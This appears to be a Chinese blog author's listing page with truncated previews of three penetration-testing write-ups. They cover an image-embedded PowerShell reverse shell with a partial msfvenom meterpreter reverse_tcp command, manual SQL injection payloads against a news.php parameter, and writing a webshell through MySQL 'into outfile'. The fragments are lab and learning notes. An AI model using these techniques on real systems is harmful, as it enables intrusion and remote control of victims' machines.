实战
关注
分享
扫一扫
cxk331
这个作者很懒,什么都没留下…
展开
-
某公众号之图片反弹shell(标题党)
某公众号之图片反弹shell具体公众号猜吧,哈哈哈哈原项目地址https://github.com/peewpw/Invoke-PSImage攻击机 kali 192.168.5.102靶机 win10 192.168.0.311)生成一个msf ps1脚本msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.5....原创 2019-07-04 13:01:05 · 797 阅读 · 2 评论 -
一次简单手工注入
一次简单的手工注入注入点http://xxx/news.php?newsid=18收集了下IP,不能sqlmap了,就只能手工了。1)确定注入点。经典 and 1=1 1=22)简单的order by 确定字段数。一直报错,感觉是被过滤了,后面使用注释符也不行使用union select 1,2,3也报错,确定不了字段数。3)尝试报错注入成功payload:union ...原创 2019-07-29 21:23:49 · 318 阅读 · 0 评论 -
一次渗透
注入1)网站首页2)简单and 1=1 ,1=2判断注入点3)order by 确定字段数为9,显示位union select 1,2…判断为4和84)判断权限root权限,思考使用into outfile直接写shell或者是外联数据库,使用日志getshell5)into outfile写shell。判断mysql版本为5.5,既必须查看secure-file-priv导...原创 2019-08-12 22:45:20 · 783 阅读 · 1 评论